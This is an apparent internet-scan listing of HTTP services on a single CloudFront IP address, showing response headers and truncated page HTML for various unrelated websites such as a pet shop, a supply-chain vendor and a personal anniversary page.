HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Date: Mon, 22 Dec 2025 04:25:01 GMT Pragma: no-cache Location: http://glowtheskin.com/ Server: nginx P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: IMWEBVSSID=c358e94a333ss4lt825ithq5n2n6vo4hp2ah5c7rlfg6jvd3il239bg0k37fcq754vdd4i2hure6irjdgfrmqojn07kfra0j9k4vt60; path=/; SameSite=None; Secure=true; domain=loveedellis.co.kr; HttpOnly Set-Cookie: al=KR; expires=Sun, 18-Oct-2026 04:25:01 GMT; Max-Age=25920000; path=/; domain=loveedellis.co.kr; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate X-Cache: Miss from cloudfront Via: 1.1 0a71d283a25c1e3f082b4dbc9d844dfe.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: fGulWFSZK3kICDFM36mr9gjRFFmwI87cBEGhsbHEAOxP8IqycEwxiA==
Open service 13.32.99.35:80 · loveedellis.co.kr
2025-12-22 04:24
HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Date: Mon, 22 Dec 2025 04:25:01 GMT Pragma: no-cache Location: http://glowtheskin.com/ Server: nginx P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: IMWEBVSSID=r05gv6u0rkanqj1gf4m9jc071ruovq68ehob80m7m1i6e7jfupcp4lpcb7nkv4cokup76uvo3vte0b92pa34imfso96qkgo9ahpgfa3; path=/; domain=loveedellis.co.kr; HttpOnly Set-Cookie: al=KR; expires=Sun, 18-Oct-2026 04:25:01 GMT; Max-Age=25920000; path=/; domain=loveedellis.co.kr; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate X-Cache: Miss from cloudfront Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: VKV0KmOe7NCA98A5u-td2OXFjUUMD3B2BHOcElXSms6k9FPI6-Qf8g==
Open service 13.32.99.35:443 · d2qxiqk1jarx04.amplifyapp.com
2025-12-22 03:40
HTTP/1.1 404 Not Found Content-Length: 0 Connection: close Date: Mon, 22 Dec 2025 03:40:24 GMT X-Cache: Error from cloudfront Via: 1.1 dc0aad619823d3400ef947433d0af8fa.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: bnacKGR8NdZeBqsCoWAxZu0BOfSkjEzwlO8vcLUV9N9fg9CSzKjshg==
Open service 13.32.99.35:80 · d2qxiqk1jarx04.amplifyapp.com
2025-12-22 03:40
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 03:40:23 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://d2qxiqk1jarx04.amplifyapp.com/ X-Cache: Redirect from cloudfront Via: 1.1 89f400f550feb1d74a18ecb2070103ac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: FL_rXwbcagPPuv1CrQL5n8S0GTfhsGmqpNqgkPDvy0h4itPSnmsRCQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · jazyemilio.com
2025-12-22 03:39
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Mon, 22 Dec 2025 03:39:43 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: 7XvQIuW95xYLYXmte6JgCppmIeMcdXu2ZFigsbx3t0jcL7KuH3JaZA==
Age: 1
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:80 · jazyemilio.com
2025-12-22 03:39
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 03:39:42 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://jazyemilio.com/ X-Cache: Redirect from cloudfront Via: 1.1 b4904c5988fd0eaae341a12cc47f3766.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 6Ewvatsi0OOYfjhrKONWicxusA6s6q9t0LV1HVC3xyK8I9w4wdy6FQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · rmm.datto.com
2025-12-22 03:38
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 225 Connection: close Last-Modified: Tue, 10 Dec 2024 17:28:38 GMT Server: AmazonS3 Date: Mon, 22 Dec 2025 03:38:22 GMT ETag: "62f285b3e0f9da78ca3f0133261a129e" X-Cache: Hit from cloudfront Via: 1.1 89f400f550feb1d74a18ecb2070103ac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: eNCNlu9_kq_BZZ0ZViC6D_HnoeuTkTdCkta1wrC0FlTS3WA1T7DvVg== <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="refresh" content="0; URL=https://www.datto.com/" /> <meta name='zd-site-verification' content='d56rnrclmn7jwg6efxlcm' /> </head> <body> </body> </html>
Open service 13.32.99.35:80 · rmm.datto.com
2025-12-22 03:38
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Mon, 22 Dec 2025 03:38:21 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://rmm.datto.com/ X-Cache: Redirect from cloudfront Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: u6Hn0hA4tLXhacxmH9RPySetmyul-2DPVZRdNMce9gp58m3l7MY3JQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · n.fplr.co
2025-12-21 10:59
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 efb4ddf9650598b987ef5db782c5b530.cloudfront.net (CloudFront)
Age: 725737
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: v1reCSBgxRuDpgkeVu-KAxtoB8DepwKnXIuInB55MmR0H6acqDLybA==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · www.smmallsonline.com
2025-12-21 10:11
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Sun, 21 Dec 2025 10:12:00 GMT X-Powered-By: CloudFront Link: <https://www.smmallsonline.com/wp-json/>; rel="https://api.w.org/", <https://www.smmallsonline.com/wp-json/wp/v2/pages/1190>; rel="alternate"; title="JSON"; type="application/json", <https://www.smmallsonline.com/>; rel=shortlink Server: CloudFront X-Cache: Miss from cloudfront Via: 1.1 b43c04a791e8dcb8ddb6bb0847fcf95a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: S1ZNcyS2C82SEyPCZoiS5SvDU_xaWROnDZMVeAzXYThT_yETuPQUPg== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · exchange-ui-master.rnd.exberry-rnd.io
2025-12-21 07:05
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1382
Connection: close
Date: Sun, 21 Dec 2025 07:05:07 GMT
Last-Modified: Wed, 17 Dec 2025 09:30:32 GMT
ETag: "b6832f6230368a66f285467811e6237f"
x-amz-server-side-encryption: AES256
Cache-Control: max-age=0
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: gNPc_4fUx1-TARZcUVoBt8l1s5aWtwNzyenw3gTNzacFokirr-eHPA==
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: Origin
Page title: Exberry Master Exchange
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="description" content="Web application for traders" />
<meta name="title" content="Exberry Master Exchange" />
<title>Exberry Master Exchange</title>
<link rel="mask-icon" href="/static/favicon.png" color="#FFFFFF" />
<link rel="shortcut icon" id="favicon" href="/static/favicon.png" type="image/png" />
<link rel="apple-touch-icon" href="/static/apple-touch-icon.png" sizes="180x180" />
<link rel="alternate icon" href="/static/favicon.png" type="image/png" sizes="32x32" />
<link rel="manifest" href="/manifest.webmanifest">
<meta name="theme-color" content="#ffffff" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<!-- MUI font -->
<link
href="https://fonts.googleapis.com/css2?family=Noto%20Sans:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap"
rel="stylesheet"
/>
<!-- Default loaded css only spinner -->
<script type="module" crossorigin src="/assets/index-Bwo61zod-1765963768729.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-NTh3zHMw-1765963768729.css">
<script id="vite-plugin-pwa:register-sw" src="/registerSW.js"></script></head>
<body>
<div id="root">
<div id="loading"></div>
</div>
</body>
</html>
Open service 13.32.99.35:443 · petmat.cl
2025-12-21 06:26
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2437
Connection: close
Date: Sat, 29 Nov 2025 10:16:34 GMT
Cache-Control: public, max-age=0, s-maxage=31536000
Server: AmazonS3
Accept-Ranges: bytes
ETag: "a1466997331e1d3da3016bc49e397175"
Last-Modified: Sat, 29 Nov 2025 02:51:03 GMT
X-Cache: Hit from cloudfront
Via: 1.1 b4904c5988fd0eaae341a12cc47f3766.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: nILpQ7R629rUTu6guZmdbMGZtosa-rqQY7bh3ee9HjFieMDb5E25_w==
Age: 1887009
Page title: PetMAT - Accesorios para Mascotas
<!doctype html>
<html lang="es">
<head>
<meta charset="UTF-8" />
<link rel="icon" type="image/png" href="/favicon.png" />
<link rel="apple-touch-icon" href="/favicon.png" />
<link rel="shortcut icon" href="/favicon.png" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>PetMAT - Accesorios para Mascotas</title>
<meta name="description" content="Accesorios diseñados para hacer feliz a tu mascota. Productos seguros, duraderos y pensados para su bienestar." />
<meta name="keywords" content="mascotas, perros, gatos, accesorios, juguetes, alfombra olfativa, comedero automático" />
<!-- Open Graph / Facebook -->
<meta property="og:type" content="website" />
<meta property="og:url" content="https://petmat.cl/" />
<meta property="og:title" content="PetMAT - Accesorios para Mascotas" />
<meta property="og:description" content="Accesorios diseñados para hacer feliz a tu mascota. Productos seguros, duraderos y pensados para su bienestar." />
<meta property="og:image" content="https://petmat.cl/og-image.jpg" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="630" />
<meta property="og:image:alt" content="PetMAT - Accesorios para Mascotas" />
<meta property="og:site_name" content="PetMAT" />
<meta property="og:locale" content="es_CL" />
<!-- Twitter -->
<meta property="twitter:card" content="summary_large_image" />
<meta property="twitter:url" content="https://petmat.cl/" />
<meta property="twitter:title" content="PetMAT - Accesorios para Mascotas" />
<meta property="twitter:description" content="Accesorios diseñados para hacer feliz a tu mascota. Productos seguros, duraderos y pensados para su bienestar." />
<meta property="twitter:image" content="https://petmat.cl/og-image.jpg" />
<meta property="twitter:image:alt" content="PetMAT - Accesorios para Mascotas" />
<!-- WhatsApp y otras plataformas -->
<meta name="image" content="https://petmat.cl/og-image.jpg" />
<meta name="theme-color" content="#6CC5E9" />
<!-- Canonical URL -->
<link rel="canonical" href="https://petmat.cl/" />
<script type="module" crossorigin src="/assets/index-3lVkIHgK.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-DkWYEZ3c.css">
</head>
<body>
<div id="root"></div>
</body>
</html>
Open service 13.32.99.35:80 · petmat.cl
2025-12-21 06:26
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Sun, 21 Dec 2025 06:26:44 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://petmat.cl/ X-Cache: Redirect from cloudfront Via: 1.1 d262e104d5d9dd6a4a52f090bdf9395c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 11cOVNZOrQl5FPwG_q6azs3lkrVWhlIo-4KUSlHDWUunfqo0bCHCOQ== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · triathlon-lumina.com
2025-12-21 05:18
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Sun, 21 Dec 2025 05:18:44 GMT Link: <https://triathlon-lumina.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Set-Cookie: AWSALB=4JFOaW94/ruWP8Fg1fcEtZIF6CO2aqu3DTcV0P+OdB9/rfm6syDIZwySd0tQ+a7G97zD5hBdK1/Rt9y2p4hqgTIP+oDPnUXDY3qB0KfULgCmv6KD34IzI6EiiJJp; Expires=Sun, 28 Dec 2025 05:18:44 GMT; Path=/ Set-Cookie: AWSALBCORS=4JFOaW94/ruWP8Fg1fcEtZIF6CO2aqu3DTcV0P+OdB9/rfm6syDIZwySd0tQ+a7G97zD5hBdK1/Rt9y2p4hqgTIP+oDPnUXDY3qB0KfULgCmv6KD34IzI6EiiJJp; Expires=Sun, 28 Dec 2025 05:18:44 GMT; Path=/; SameSite=None Set-Cookie: uk5f046a4df0598=90a237a458ab8092d3a1b1fef02fb1fe; path=/; secure; HttpOnly; SameSite=None Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.3.19 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Cache: Miss from cloudfront Via: 1.1 319f376925908156190f5fc160137b42.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: CqODxs-R57kDfbpFmmR748ExYVfhXwW7ucjUc5HFXHw7qEov59zpTw==
Open service 13.32.99.35:443 · plantryx.com
2025-12-21 04:58
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15550
Connection: close
Date: Sun, 21 Dec 2025 04:58:20 GMT
Last-Modified: Tue, 02 Dec 2025 06:28:23 GMT
ETag: "16f13bad41987047761c6b9cb4ff53b3"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 968007545c497b68cc41825f11e930ba.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 7YI0B9GW8n8fPAFtxFSYV4h6V71iKRDz8cH3ZlB3Qvr3NeK8odV5nQ==
Page title: Supply Chain AI Solutions By Plantryx
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WP86JFDT');</script>
<!-- End Google Tag Manager -->
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="index, follow">
<link rel="canonical" href="https://plantryx.com/index.html">
<title>Supply Chain AI Solutions By Plantryx</title>
<link rel="shortcut icon" href="assets/imgs/logos/plantryx-icon.svg" type="image/x-icon">
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NGGSZTNBQD"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-NGGSZTNBQD');
</script>
<!-- Bootstrap CSS -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- Bootstrap Icons -->
<link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.0/font/bootstrap-icons.css" rel="stylesheet">
<!-- Custom CSS -->
<link rel="stylesheet" href="assets/css/main.css">
</head>
<body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WP86JFDT"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<!-- Navigation -->
<nav class="navbar navbar-expand-lg navbar-dark fixed-top">
<div class="container">
<a class="navbar-brand" href="index.html">
<img src="assets/imgs/logos/logo.svg" alt="Plantryx" height="40">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link active" href="index.html">Home</a>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Platform & Solutions
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="solutions/demand-planning.html">Demand Planning</a></li>
<li><a class="dropdown-item" href="solutions/supply-planning.html">Supply Planning</a></li>
<li><a class="dropdown-item" href="solutions/end-to-end-planning.html">End-to-End Planning</a></li>
<li><a class="dropdown-item" href="solutions/platform-capabilities.html">Platform Capabilities</a></li>
<li><a class="dropdown-item" href="solutions/integrations.html">Integrations</a></li>
</ul>
</li>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" role="button" data-bs-toggle="dropdown">
Who We Help
</a>
<ul class="dropdown-menu">
<li><a class="dropdown-item" href="industries/mobility-auto.html">Mobility & Auto</a></li>
<li><a class="dropdown-item" href="industries/consumer-goods.html">Consumer Goods</a></li>
<li><a class="dropdown-item" href="industries/energy-commodities.html">Energy & Commodities</a></li>
<li><a class="dropdown-item" href="industries/high-tech.html">High Tech</a></li>
<li><a class="dropdown-item" href="industries/industrial-manufacturing.html">Industrial Manufacturing</a>
</li>
<li><a class="dropdown-item" href="industries/healthcare-life-sciences.html">Healthcare & Life
Open service 13.32.99.35:443 · crxextractor.com
2025-12-20 23:37
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12924
Connection: close
Last-Modified: Mon, 04 Dec 2023 21:45:52 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Sat, 20 Dec 2025 23:20:04 GMT
ETag: "79adf69782c1a8cac16fa085fbb938c4"
X-Cache: Hit from cloudfront
Via: 1.1 c80ae6bd97b709ed6e4747f0d5ea4efc.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: o2AyVzj8BEUjpoBstAz8B0lpNB-lU2-WmDhFLSkaWJWkc_BgRroufQ==
Age: 45253
Page title: Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.
<!DOCTYPE html><html lang="en"><head><script>!function(e,t,a,n,r){e[n]=e[n]||[],e[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"});var g=t.getElementsByTagName(a)[0],m=t.createElement(a),s="dataLayer"!=n?"&l="+n:"";m.async=!0,m.src="https://www.googletagmanager.com/gtm.js?id="+r+s,g.parentNode.insertBefore(m,g)}(window,document,"script","dataLayer","GTM-FVTW7P4")</script><title>Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.</title><meta name="keywords" content="crx, chrome, extension, get, extract, download, source, code" /><meta name="description" content="Get Chrome Extension as .crx file and extract it's source code in one click, right in your browser." /><meta charset="utf-8" /><meta name="viewport" content="width=device-width" /><meta name="author" content="Vladimir Ignatev" /><link rel="icon" type="image/png" href="images/favicon.png" /><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-FVTW7P4" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div class="breakthrough center nomargin"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div><div class="tool-wrapper"><div class="logo"><img src="images/logo.png" height="50" alt="crx extractor logo"></div><div class="welcome"><div class="row"><div class="twelve columns"><div class="container"><div class="twelve columns"><div class="header-wrapper"><h1>Get .crx Chrome Extension file and extract source code in one click</h1></div><div class="cta-wrapper"><button class="button-primary cta-button" id="cta-letsstart" tabindex="1">Let's start</button></div></div></div></div><div class="twelve columns adsense-top-side hide-small"><div class="adsense-wrapper hide-small" style="margin-top:-17rem"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div></div></div></div><div class="tool container" style="display:none"><div class="row"><div class="five columns"><h3 class="center">Get source code</h3><div id="drop-zone"><div class="thanks" style="display:none"><p>You're awesome! Thank you! ❤</p></div><div class="ui-wrapper"><p>Drop .crx file here or click <br>the button to choose the file</p><input type="file" name="file" id="file" tabindex="5"></div><div class="download-btn-wrapper"><a href="#" style="display:none" tabindex="6" class="download button button-primary">Download source</a></div></div><div class="download-source-err" style="display:none"><p></p></div></div><div class="seven columns"><div class="container"><div class="row"><div class="twelve columns"><h3 class="center">Download .CRX file from the <a href="https://chromewebstore.google.com/" target="_blank" rel="nofollow">Chrome WebStore</a></h3></div></div><div class="row"><div class="twelve columns"><input tabindex="2" id="crx-download-input" class="u-full-width" placeholder="Paste the URL of Chrome Extension here"><button class="download-crx-ok button-primary" tabindex="3">OK</button><a href="#" style="display:none" class="download-crx button button-primary" tabindex="4">Get .CRX</a><p id="crx-suggestion"><i class="typcn typcn-arrow-sync"></i><span class="name">extension</span><span class="link">link</span></p></div></div><div class="row"><div class="twelve columns"><div class
Open service 13.32.99.35:443 · www.legalaidconnections.org
2025-12-20 23:30
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 829
Connection: close
Date: Sat, 20 Dec 2025 23:30:49 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: x-wtc-header,Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 6bf2ca4ea5a5c92a1d7cd2f9767e8674.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: pV9E9nSpALecrPAyk0dJnMp4HyrX-IOFMszJf6KmekEiEtga_JQIlQ==
Page title: Atlanta Legal Aid Society, Inc.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<html>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-82274979-1', 'auto');
ga('send', 'pageview');
</script>
<head>
<title>Atlanta Legal Aid Society, Inc. </title>
</head>
<frameset rows="100%,*" border="0">
<frame src="https://events.atlantalegalaid.org/index.php/cocktails-connections-working-draft/" frameborder="0" />
<frame frameborder="0" noresize />
</frameset>
<!-- pageok -->
<!-- 05 -->
<!-- -->
</html>
Open service 13.32.99.35:443 · riverswimmers.club
2025-12-20 23:14
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15069
Connection: close
